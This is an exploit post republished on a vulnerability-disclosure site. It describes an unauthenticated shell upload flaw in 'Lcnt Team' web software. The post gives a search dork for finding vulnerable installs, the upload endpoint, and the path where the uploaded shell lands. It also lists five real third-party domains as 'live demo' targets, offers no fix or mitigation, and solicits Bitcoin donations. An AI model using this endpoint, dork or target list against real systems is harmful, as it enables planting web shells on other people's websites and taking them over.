Lcnt Team Shell Upload Vulnerability

Published
Credit
Risk
2017.04.11
xBADGIRL21
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Lcnt Team Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team
# Vendor : http://icnt.net
# Tested on: [WIN7]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 10-04-2017
# video Proof : https://youtu.be/s5hF8CQzKgM
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
#|X|B|A|D|G|I|R|L|2|1|
######################
# [+] Poc :
######################
# [!] Exploit : http://127.0.0.1/admin/pic_add.php?Element=shopspic
# [!] Shell Path : http://127.0.0.1/admin/lcnt/[RANDOM_NUM].php
######################
# [!] Live Demo :
######################
# http://trofom.com/admin/pic_add.php?Element=shopspic
# http://www.chinaomay.com/admin/pic_add.php?Element=shopspic
# http://bisco.net.cn/admin/pic_add.php?Element=shopspic
# http://www.wzican.com/admin/pic_add.php?Element=shopspic
# http://www.raxinte.com/admin/pic_add.php?Element=shopspic
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://youtu.be/s5hF8CQzKgM


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com